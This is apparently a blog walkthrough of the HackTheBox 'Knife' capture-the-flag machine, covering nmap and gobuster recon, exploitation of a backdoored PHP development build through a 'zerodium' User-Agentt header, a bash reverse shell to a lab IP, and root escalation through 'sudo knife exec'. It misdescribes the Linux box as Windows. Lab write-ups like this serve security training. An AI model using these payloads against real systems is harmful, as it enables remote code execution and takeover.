HackTheBox — Knife Walkthrough
Summary
This is a write-up for a fairly easy windows machine from hackthebox.eu named knife. This box is a great first box to pwn if you are new to hackthebox. This box has a PHP developer version installed as a webserver where we get to use a backdoor to get the initial foothold, from there we can look around and escalate our privilege to root. So, let’s jump in.
Recon
We start with a map to discover the open ports, I find this below code pretty helpful when doing CTFs as it runs a full port scan pretty fast and then runs another nmap on the open ports using the default scripts and version enumeration flag. This is taken from the starting point module in hackthebox. You can find it there, or you can visit this link to my repository in order to check out the script. The script here is a bit modified to store the outputs in a nmap folder.
ports=$(nmap -p- --min-rate=1000 -T4 -oA nmap/knife_open_ports 10.10.10.242 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -sC -sV -p$ports -oA nmap/knife 10.10.10.242
Looking at the results:
# Nmap 7.91 scan initiated Sun Sep 12 05:42:33 2021 as: nmap -sC -sV -p22,80 -oA nmap/knife 10.10.10.242
Nmap scan report for 10.10.10.242
Host is up (0.13s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep 12 05:42:45 2021 -- 1 IP address (1 host up) scanned in 11.58 seconds
We can see only two ports open port 22 and port 80.
SSH
The 22 port banner leaks the OpenSSH version along with the platform, which is Ubuntu. We can check for the OpenSSH version over the web and see that the version is not vulnerable to any known vulnerabilities.
HTTP
Let’s have a look at port 80:
We can see a static website. After looking at the source code, it doesn't leak, any kind of CMS data. It seems like it is a static page.
Adding index.html, index.php at the end of the URL:
For the outputs, we can say that the application supports PHP extension. we can now use this information while starting our gobuster.
gobuster dir -u http://10.10.10.242/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -o initial.crawl -t 20 -x php
While the gobuster is running let us check the request and response in BurpSuite:
We can see that the server header leak the PHP version. Let’s search it over google and see if we can see anything interesting.
Looking at the results, we can see that there is a backdoor that allows us to perform remote code execution.
There is an exploit-db exploit which we can run. We can also look at the blogs to see how it works. This blog by flast101 explains it really well. I recommend reading it to get a better understanding.
Two malicious commits were pushed to the PHP Git code repo on Sunday, March 28, and signed off under the names of PHP creator, Rasmus Lerdorf, and maintainer Nikita Popov.
In the malicious commits, the attackers published a mysterious change upstream, “fix typo” under the pretense this was a minor typographical correction.
However, taking a look at the added line 370 where
zend_eval_string
function is called, the code actually plants a backdoor for obtaining easy Remote Code Execution (RCE) on a website running this hijacked version of PHP. This line executes PHP code from within the useragent HTTP header, if the string starts with ‘zerodium’.
Zerodium is a Washington-based security firm that specializes in buying and selling zero-day vulnerabilities for a variety of operating systems and popular desktop and Web applications, including for PHP itself.
Our gobuster scan doesn't give us much.
Initial Foothold
In order to exploit we send the request and change the User-Agent header to User-Agentt and then add our payload.
User-Agentt: zerodiumsystem(‘id’);
After we send the payload we can see that the remote code is executed, and we get the output.
Let’s try to get a reverse shell. We set our netcat listener on port 9001
Let us send the reverse shell via the payload:
User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/10.10.14.3/9001 0>&1'");
And we get a shell back
Now, we convert out shell to a proper tty, and we can see that we are james
Enumeration
Now, we can focus on escalating our privileges
Let’s check if james can run any command as sudo, and we can see that james can run knife as sudo
Lets check gtfobins if we can find anything interesting for knife.
We can see from he blog as if we can run knife as sudo we can escalate our privileges
Let’s try that
Privilege Escalation
We run the following command,
sudo knife exec -E 'exec "/bin/sh"'
Voila!!! we are root
Flags
# cat root.txt
93565db39d2077f07dd902....713c0
# cat /home/james/user.txt
280d22fe89a681e532be875....6c691
Hope you like this wrtie-up.
~m1kU